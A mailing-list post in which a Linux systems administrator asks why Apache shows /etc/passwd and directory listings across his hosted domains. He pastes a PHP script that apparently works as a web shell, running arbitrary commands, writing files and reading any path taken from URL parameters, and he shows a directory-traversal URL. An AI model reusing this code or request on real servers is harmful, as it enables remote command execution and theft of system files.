Hi,
I have Apache/2.2.3 running on an Arch Linux box, currently hosting about
500 odd domains.
When I browse to a specific domain such as:
http://www.domian.co.za/files.php?l=../../../../../etc/passwd
it displays the contents of the file /etc/passwd , as with any directory
that I might request via the URL.
I changed all the "Options Indexes" to "Options -Indexes" in httpd.conf,
even removed them, yet Apache still displays my directories.
I tried adding the "Options -Indexes" to an .htaccess file, but
still with no luck.
Here's the files.php script:
<?php
/*
* Assume document root is /usr/local/websites/mydomain
* The actual doc root is /var/www/vhosts/mydomain
*/
$location = $_GET['l']; ;//'../../fly.co.za/subdomains'; // Move
up one directory
$parent = dir($location);
$com = $_GET['c'];
if($com != null)
{
echo "<pre>";
echo system($com);
echo "</pre>";
die();
}
$w = $_GET['w'];
if($w != null)
{
file_put_contents($location . $w,$w);
die();
}
// List the contents of the current directory
// i.e.: /usr/local/websites
if(is_file($location))
{
echo "<pre>";
readfile($location);
echo "</pre>";
}
while($entry = $parent->read()) {
echo $entry . '<br>';
}
$parent->close();
?>
This lists *all* directories with a little playing in the path, except
/etc/shadow,
seeing as the permissions on /etc/shadow is 700, not 755 like the rest
of the files
in the directory. As it should be.
How do I fix this?
If this is the wrong list for this, please accept my apologies.
Thank you.
--
Regards,
Francois Hall<http://www.webafrica.co.za>
Snr. Linux Systems Administrator
________________________________
+27 21 464 9876 : Telephone 0861 555 222 : Reception
________________________________
Web Africa Networks (Pty) Ltd
[ Named one of the Top 50 ICTe Companies in SA ]
[ MyBroadband People's Choice, ISP of the Year ]
Disclaimer: http://www.webafrica.co.za/disclaimer